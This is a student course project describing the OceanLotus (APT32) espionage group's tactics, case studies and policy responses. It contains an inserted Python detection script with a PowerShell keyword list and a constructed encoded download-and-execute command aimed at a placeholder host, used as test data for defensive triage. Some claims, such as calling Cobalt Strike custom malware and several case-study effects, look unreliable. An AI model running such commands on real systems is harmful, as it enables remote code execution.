
Peer reviewed Project on

OCEAN LOTUS
CYBER-THREAT ACTORS

Completed by John Sitima
In partial fulfilment of Cybersecurity for Everyone

(C) 2024
johnsitima@gmail.com
Cybersecurity

Cybersecurity refers to the practice of protecting internet-connected systems, including hardware, software, and data, from attack, damage, or unauthorized access.

Threat actors

These are individuals or groups who purposefully harm digital devices or systems.

Ocean Lotus
OceanLotus, also recognized as APT32, is a threat actor that emerged from
Vietnam in 2014. This group has focused on various sectors such as
manufacturing, network security, technology infrastructure, banking, media, and
consumer products.

They are also known by the aliases APT32, BISMUTH, Canvas Cyclone and APT-C-00.

Their level of skill
Ocean Lotus has demonstrated a high level of technical sophistication and
operational competency. The group has shown the ability to conduct long-term
intrusion campaigns, maintain persistent access to targeted networks, and evade
detection by employing advanced obfuscation and anti-forensic techniques.

Capability and tactics used by Ocean Lotus cyber threat actors

The APT32 group has been known to employ a wide range of attack vectors and tools
to compromise its targets. These include spear-phishing emails, watering hole attacks,
social engineering techniques, and the use of custom malware. The group has been
observed using various malware families, such as Cobalt Strike, PlugX, and
PowerShell-based backdoors, to establish persistence on compromised systems and
exfiltrate sensitive data.

Targets of Ocean Lotus
The group's activities have primarily targeted government organizations, foreign
corporations, dissidents, journalists, and other entities of interest to the Vietnamese
government.

The group has been linked to cyber attacks targeting dissidents and human rights
activists, indicating a broader agenda that includes monitoring and suppressing internal
dissent (Amnesty 2021).

Motivations of the Ocean Lotus

The motivations of the OceanLotus threat actor are believed to be primarily related
to espionage and intelligence gathering. They have been known to target government
agencies, defense contractors, and technology companies to steal sensitive
information that could be used for strategic or financial gain.

The targets of the Ocean Lotus group are generally foreign companies with established
success and interests in Vietnam's hospitality, manufacturing, and consumer goods sectors.
As well as the private sector, the Ocean Lotus group targets politicians and journalists
opposed to the Vietnamese government (Brandefense 2022).

Ocean Lotus Geo-Political context
The cyberespionage group Ocean Lotus, active since 2014, targets organizations
in various industries in Vietnam and other Southeast Asian countries.

Insights on the Ocean Lotus modus operandi

The group has been known to employ a wide range of attack vectors and tools to
compromise its targets. These include spear-phishing emails, watering hole attacks,
social engineering techniques, and the use of custom malware.

The group has been observed using various malware families, such as Cobalt Strike,
PlugX, and PowerShell-based backdoors, to establish persistence on compromised
systems and exfiltrate sensitive data for ransom and corporate espionage.

THE HACKING PROCESS

The Lockheed Martin Cyber Kill Chain (CKC)

This is a security defence model developed by Lockheed Martin to identify and stop
sophisticated cyberattacks before they impact an organization. The model comprises
the following steps:
i. Reconnaissance
ii. Weaponization
iii. Delivery
iv. Exploitation
v. Installation
vi. Command and Control
vii. Action on target.
(Source: lockheedmartin.com 2012)

Based on the above, the researcher has created a mnemonic to ease assimilation and
conceptualization of the 7 steps of the CKC: (Real, Warriors, D, I, E, Commanding,
Action on target).

The Ocean Lotus group has utilised these steps in exploiting their numerous
targeted victims.
Tactics used by Ocean lotus actors on their targets.

The Ocean Lotus cyber actors employ a diverse range of tactics, techniques, and
procedures (TTPs) to target and compromise their victims. According to Kaspersky
(Source: Kaspersky.com 2019), some of the key tactics used by the group include:

1. Spear-Phishing Attacks:
Ocean Lotus is known for conducting highly targeted spear-phishing campaigns,
often using socially engineered lures related to the victim's interests or industry.
The group leverages malicious attachments or links in the phishing emails to deliver
their custom malware payloads.

2. Watering Hole Attacks:
The group has been observed setting up malicious websites or compromising
legitimate websites frequented by their targets.
These watering hole attacks aim to infect visitors with malware when they access
the compromised web resources.

3. Social Engineering:
Ocean Lotus actors rely heavily on social engineering techniques to gather
information about their targets and gain their trust.

Tactics used by Ocean Lotus actors on their targets (continued)

4. Malware Deployment:
The group has been linked to the use of various custom-made malware families,
including Cobalt Strike, PlugX, and PowerShell-based backdoors. This malware is
designed to establish persistent access, exfiltrate data, and conduct further
reconnaissance on the compromised systems.

5. Exploitation of Vulnerabilities:
Ocean Lotus actors actively seek out and exploit vulnerabilities in popular
software, operating systems, and web applications to gain initial access to their
targets. They often leverage zero-day vulnerabilities to bypass security measures
and maintain a stealthy presence on the compromised systems.

6. Lateral Movement and Privilege Escalation:
Once inside the target network, the group employs techniques to move laterally
and escalate privileges, allowing them to access sensitive data and resources.
This includes the use of credential harvesting, privilege escalation exploits, and
tools like Mimikatz.

Tactics used by Ocean Lotus actors on their targets (continued)

7. Data Exfiltration:
The ultimate goal of Ocean Lotus's operations is to gather intelligence and
exfiltrate sensitive data from their targets.
The group has been observed using various techniques, such as encrypted data
transfers, to siphon off valuable information without raising suspicion.

8. Operational Security and Obfuscation:
To evade detection and maintain persistent access, Ocean Lotus actors employ
advanced obfuscation techniques, such as code encryption, anti-analysis
measures, and the use of legitimate network protocols for command-and-control
communications.
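From a defender's side, the PowerShell-based backdoors in tactic 4 and the obfuscation in tactic 8 both tend to surface as PowerShell being launched with an encoded command line. As an added example that is not part of the original project, the Python below triages constructed process-creation log lines (a hypothetical `timestamp | host | parent | command line` format, not any real product's output), decodes the base64/UTF-16LE payload that PowerShell's -EncodedCommand flag expects, and scores each launch on signals such as an Office parent process, a hidden window and known download-and-execute keywords. The token list, weights and threshold are assumptions chosen for illustration.

```python
"""Triage helper (added example, not from the project): flag PowerShell launches
that use an encoded command line and recover the plaintext for analyst review.
All log lines below are constructed samples, not real telemetry."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed indicators: substrings an analyst would want to see in a command line
# or its decoded payload. Weights and the list itself are illustrative choices.
SUSPICIOUS_TOKENS = (
    "downloadstring", "invoke-expression", "iex ", "frombase64string",
    "net.webclient", "-w hidden", "-windowstyle hidden",
)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is
# base64 over UTF-16LE text. Used here only to construct the sample log.
def _b64_utf16le(text: str) -> str:
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")

# Constructed sample events in a hypothetical "ts | host | parent | cmdline" format.
SAMPLE_LOG = "\n".join([
    "2024-03-07T09:12:01Z | WS-01 | explorer.exe | powershell.exe -NoProfile -Command Get-Date",
    "2024-03-07T09:15:44Z | WS-01 | winword.exe | powershell.exe -w hidden -nop -enc "
    + _b64_utf16le("Invoke-Expression (New-Object Net.WebClient)"
                   ".DownloadString('http://placeholder.invalid/s')"),
    "2024-03-07T09:20:10Z | WS-02 | cmd.exe | powershell.exe -EncodedCommand "
    + _b64_utf16le("Get-Process | Sort-Object CPU"),
])

# Match the common spellings of the encoded-command flag followed by its argument.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+(\S+)")


@dataclass
class Finding:
    host: str
    parent: str
    decoded: Optional[str]
    score: int
    reasons: List[str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an encoded PowerShell command, or None if the
    command line has no such flag or the argument is not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage_line(line: str) -> Optional[Finding]:
    """Score one process-creation event; None for malformed or non-PowerShell lines."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != 4:
        return None
    _ts, host, parent, cmd = parts
    if "powershell" not in cmd.lower():
        return None
    reasons: List[str] = []
    score = 0
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command line")
    if parent.lower() in OFFICE_PARENTS:
        score += 3
        reasons.append(f"spawned by Office process {parent}")
    # Search both the raw command line and the decoded payload for indicators.
    haystack = (cmd + " " + (decoded or "")).lower()
    for token in SUSPICIOUS_TOKENS:
        if token in haystack:
            score += 2
            reasons.append(f"token {token!r}")
    return Finding(host, parent, decoded, score, reasons)


def triage_log(text: str, threshold: int = 4) -> List[Finding]:
    """Return the events whose score reaches the (assumed) alerting threshold."""
    findings = []
    for line in text.splitlines():
        f = triage_line(line)
        if f is not None and f.score >= threshold:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"{f.host} parent={f.parent} score={f.score}")
        print("  reasons:", "; ".join(f.reasons))
        print("  decoded:", f.decoded)
```

Of the three constructed events only the Word-spawned, hidden-window, encoded launch crosses the threshold; the encoded but benign `Get-Process` line from cmd.exe scores too low, which is the point of decoding before alerting rather than flagging every encoded command.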

Case studies of cyber attacks by the Ocean Lotus group and their
effects over the years

Case 1: In 2017, Ocean Lotus carried out a campaign against Vietnam's National
Assembly. The group sent spear-phishing emails containing a link to a fake website
that mimicked the National Assembly's intranet login page. Victims who attempted to
log in had their credentials stolen by Ocean Lotus.

The Effects:

Primary effects:-
The website was defaced. The threat actors obtained the credentials of Vietnam's
National Assembly members via the intranet, and the intranet was rendered
inoperable for some time.

Secondary effects:-
The attack disrupted the functioning of the intranet, with the secondary effect
that Vietnam's National Assembly could not carry out its government duties
effectively.

Second order effects:-
The loss of data integrity and the exposure of confidential parliamentary details,
including its structures and leadership, led the general public to fear for the
privacy of their own data.
Case studies of cyber attacks by the Ocean Lotus group and their effects
over the years (continued)

Case 2: Operation Cobalt Kitty 20... (Source: Cybereason.com 2019)

In Operation Cobalt Kitty, the Ocean Lotus group targeted global corporations based in
Asia with the goal of stealing proprietary business information. The threat actor
targeted the company's top-level management by using spear-phishing attacks as
the initial penetration vector.

The Effects:

Primary effects:-
The attack directly compromised more than 40 PCs and servers, including the
domain controller, file servers, web application server and database server, making
them inoperable for a time.

Secondary effects:-
The attack disrupted the functioning of the companies, resulting in secondary
effects of loss of revenue and income.

Second order effects:-
Loss of data integrity and exposure of confidential corporate private and secret data were
some of the most serious second order effects of the attack.

Case studies of cyber attacks by the Ocean Lotus group and their effects
over the years (continued)

Case 3: 2014 action on the US-based NGO Electronic Frontier Foundation (EFF),
the Associated Press international news organization and two Vietnamese activists.
(Source: Amnesty.org 2021)

Case studies of cyber attacks by the Ocean Lotus group and their effects over
the years (continued)

Case 4: 2020. A report by Bloomberg highlighted that as early as 6 January 2020, in
the midst of the coronavirus pandemic, cyber attacks by Ocean Lotus targeting the
Chinese government were under way and continued through April, according to a
senior manager for cyber-espionage at FireEye Inc and officials in the Chinese
government's threat intelligence unit. (Source: Bloomberg.com 2020)

OceanLotus used spear-phishing and malware consistent with its usual modus operandi
to target China's Ministry of Emergency Management and the Wuhan municipal government
in order to obtain information about the COVID-19 pandemic. The Vietnamese Ministry of
Foreign Affairs denied the accusations.

The Effects:

Primary effects:-
The attack directly compromised workstations and file servers, the web application
server and the database server used in collecting and collating COVID-19 data, making
them inoperable for a time.

Secondary effects:-
The attack disrupted the real-time transmission of COVID-19 statistics and data to
numerous stakeholders who needed it for decision making.

Second order effects:-
Loss of data integrity and exposure of confidential private patient data, as well as
delays in medical supplies and PPE to frontline workers, were some of the most serious
second order effects of the attack.
Characteristics of OceanLotus cyber threat actors

1. Advanced and Persistent:
Ocean Lotus is an advanced persistent threat (APT) group, demonstrating a high level
of technical sophistication and the ability to conduct long-term, targeted intrusion
campaigns.
The group has maintained a persistent presence in the networks of their targets, often
establishing a stealthy foothold to conduct ongoing espionage activities.

2. Politically Motivated:
The primary objective of Ocean Lotus appears to be cyber espionage, with a focus on
gathering intelligence for political, economic, and strategic purposes.
The group's targets have primarily included government organizations, foreign
corporations, dissidents, and other entities of interest to the Vietnamese government,
suggesting a state-sponsored or state-aligned nature.

3. Adaptable and Innovative:
Ocean Lotus has shown a remarkable ability to adapt and evolve its tactics, techniques,
and procedures (TTPs) over time.
The group has demonstrated a willingness to leverage the latest technologies, exploit
zero-day vulnerabilities, and develop custom malware to maintain an edge over its
targets and evade detection.

Characteristics of OceanLotus cyber threat actors (continued)

4. Operationally Sophisticated:
The Ocean Lotus actors have exhibited a high level of operational security, employing
advanced obfuscation techniques, utilizing legitimate network protocols for command-
and-control, and maintaining a low profile to avoid detection.
Their ability to conduct successful spear-phishing campaigns, watering hole attacks,
and lateral movement within compromised networks underscores their operational
sophistication.

5. Geographically Focused:
The group's activities have primarily targeted organizations and individuals in Southeast
Asian countries, particularly Vietnam, Laos, Cambodia, and the Philippines.
This regional focus suggests a strong alignment with the interests and objectives of the
Vietnamese government or state-affiliated entities. (Source: Bloomberg.com 2021)

6. Potentially State-Sponsored:
While definitive attribution is challenging in the cyber domain, various cybersecurity
firms and government agencies have attributed the Ocean Lotus activities to threat
actors originating from Vietnam.
The group's consistent focus on intelligence gathering and the alignment of its targets
with Vietnamese interests suggest potential state sponsorship or support.(Source:
Bloomberg.com 2021)

OceanLotus cyber threat actors: a private problem for business or a public
concern for policy makers?

Private Sector Concerns:

• Businesses, particularly those operating in Southeast Asia or with interests in the
region, are prime targets for Ocean Lotus's cyber espionage activities.
• The group's focus on gathering intelligence and stealing sensitive data poses
significant risks to private companies, as it can lead to the loss of trade secrets,
intellectual property, and other valuable information.
• Compromised businesses may suffer financial losses, reputational damage, and
disruptions to their operations, making Ocean Lotus a critical private sector
problem.
• Private companies need to prioritize robust cybersecurity measures, incident
response plans, and collaboration with security vendors and law enforcement to
mitigate the risks posed by Ocean Lotus.

Public Policy Concerns:

• Ocean Lotus's suspected state-sponsored or state-aligned nature makes it a
matter of national security and public policy concern.
• The group's targeting of government agencies, critical infrastructure, and other
entities of strategic importance raises concerns about national sovereignty,
geopolitical tensions, and the potential for cascading impacts on the public
sector.

Possible responses by policy makers to OceanLotus cyber threat actors

• Policymakers need to address the threat of Ocean Lotus through the
development of comprehensive national cybersecurity strategies, international
cooperation, and the strengthening of defensive capabilities.
• Policies related to information sharing, threat intelligence exchange, and
coordinated response mechanisms between the public and private sectors are
crucial in mitigating the risks posed by Ocean Lotus.

• Diplomatic efforts and sanctions may also be considered as part of a broader
strategy to deter and disrupt the activities of state-sponsored cyber threat actors
like Ocean Lotus.

Conclusion
Overall, the Ocean Lotus cyber threat actors represent a sophisticated, persistent,
and politically motivated group that poses a significant risk to organizations and
individuals in the Southeast Asian region. Their continuous evolution and
adaptability underscore the need for robust cybersecurity measures and
international cooperation to identify and mitigate the threats posed by such
advanced persistent threat groups.

REFERENCES
1. https://cdn.amnesty.at/media/11606/amnesty-report_caught-in-the-net_the-global-threat-from-eu-regulated-spyware_oktober-2023.pdf (accessed on 07/03/2024)
2. https://css.ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/Cyber-Reports-2018-05.pdf
3. https://www.cybereason.com/blog/operation-cobalt-kitty-apt (accessed on 01/06/2024)
4. https://www.cfr.org/cyber-operations/export-incidents (accessed on 05/04/2024)
5. https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf (accessed on 11/04/2024)
6. https://ics-cert.kaspersky.com/publications/reports/2020/04/24/threat-landscape-for-industrial-automation-systems-apt-attacks-on-industrial-companies-in-2019/ (accessed on 11/04/2024)
7. https://www.bloomberg.com/news/articles/2020-04-23/vietnamese-hackers-targeted-china-officials-at-heart-of-outbreak (accessed on 03/06/2024)
8. https://brandefense.io/blog/apt-groups/ocean-lotus-apt-group/#:~ (accessed on 13/04/2024)
9. https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Gaining_the_Advantage_Cyber_Kill_Chain.pdf
